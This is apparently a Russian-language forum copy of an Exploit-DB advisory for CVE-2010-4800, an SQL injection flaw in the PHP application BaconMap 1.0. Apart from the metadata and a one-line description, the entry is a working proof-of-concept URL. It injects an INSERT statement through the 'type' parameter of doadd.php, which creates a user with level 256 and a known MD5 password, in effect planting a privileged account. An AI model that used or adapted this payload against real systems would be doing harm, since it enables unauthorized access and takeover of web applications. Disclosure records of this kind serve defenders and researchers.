- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 15233
- Проверка EDB
-
- Пройдено
- Автор
- JOHN LEITCH
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2010-4800
- Дата публикации
- 2010-10-11
Код:
------------------------------------------------------------------------
Software................BaconMap 1.0
Vulnerability...........SQL Injection
Download................http://baconmap.nmsu.edu/
Release Date............10/10/2010
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................John Leitch
Site....................http://www.johnleitch.net/
[email protected]
------------------------------------------------------------------------
--Description--
An SQL injection vulnerability in BaconMap 1.0 can be exploited to
insert data into any table.
--PoC--
http://localhost/baconmap/doadd.php?type=user%20(email,level,password)%20values%20('[email protected]',256,md5('Password1'));%23&name=- Источник
- www.exploit-db.com
